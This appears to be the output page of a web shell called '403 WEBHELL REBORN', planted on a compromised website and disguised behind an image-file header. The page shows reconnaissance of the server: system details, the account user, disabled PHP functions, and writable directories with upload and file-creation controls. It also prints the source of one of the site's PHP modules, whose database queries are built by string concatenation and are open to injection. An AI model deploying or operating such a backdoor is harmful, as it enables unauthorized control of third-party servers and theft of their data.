ÿØÿà JFIF  ` ` ÿþš 403 WEBHELL REBORN
403 WEBHELL REBORN
Server : Apache/2
System : Linux vps.phamthanh.local 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64
User : benhviencoc7 ( 1008)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Directory :  /home/benhviencoc7/public_html/modules/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Buat Folder Baru:
Buat File Baru:

Current File : /home/benhviencoc7/public_html////////modules/LS_DSBaiviet.php
<?php

/*----------------------------------------*\
|             Copyright © C-ILY            | 
|            Phone: 0983.998.994           |
|             Y!m: notepad.html            |
|         Email: truongpv87@gmail.com      |
\*----------------------------------------*/

define('CILY',true);
//* mod_news.html BEGIN: Xem bài danh sách bài viết *//
                	$lsListCat_bv = show_dequy($this_cat['id'], 1); 
                	$p_start = ($w3c->rewrite_page -1) * get_option('paging_news');	
                    $total_p = @mysql_num_rows(@mysql_query("SELECT * FROM cily_posts WHERE post_cat IN (".$lsListCat_bv.")"));                  
					$lsList_post = @mysql_query("SELECT p.*, p.id AS pid, c.id AS cid, c.* FROM cily_posts AS p JOIN cily_cats AS c ON (p.post_cat = c.id) WHERE p.post_show = 1 AND c.cat_lang = ".$_SESSION['lang']." AND p.post_cat IN (".$lsListCat_bv.") ORDER BY p.post_timeup DESC LIMIT ".$p_start.",".get_option('paging_news'));					
                  	if(!@mysql_num_rows($lsList_post)) {
                        $w3c->parse('no_posts');
                    }
					while ($lsListpost = @mysql_fetch_array ($lsList_post)){
							$w3c->assign(
								array(                                
									'lsBvCID' => $lsListpost['cid'],
									'lsBvPID' => $lsListpost['pid'],
									'lsBvCAT_ascii' => $lsListpost['cat_name_ascii'],
									'lsBvCAT_name' => $lsListpost['cat_name'],
									'lsBvPs_ascii' => $lsListpost['post_name_ascii'],
									'lsBvPs_name' => $lsListpost['post_name'],
									'lsBvPs_quote' => catchuoi($lsListpost['post_quote'],30),
									'lsBvPs_image' => $lsListpost['post_image'],
									'lsBvPs_imgfull' => str_replace('thumbs-','',$lsListpost['post_image']),
									'lsBvPs_time' => formattime($lsListpost['post_time'],4),
								));
							$w3c->parse('lsList_post');   //*    {url}/bv/{lsBvCAT_ascii}-c{lsBvCID}/{lsBvPs_ascii}-p{lsBvPID}
                    }
                    $w3c->assign('cat_name', $this_cat['cat_name']);
					$w3c->assign('lscat_image', $this_cat['cat_img']);
                    $w3c->assign('pagingindex', pagingindex(get_option('paging_news'),$w3c->rewrite_page, $total_p, $this_cat['cat_name_ascii']."-c".$this_cat['id'], '-page-' ,false));
//* mod_news.html END: Xem bài danh sách bài viết *//

Anon7 - 2021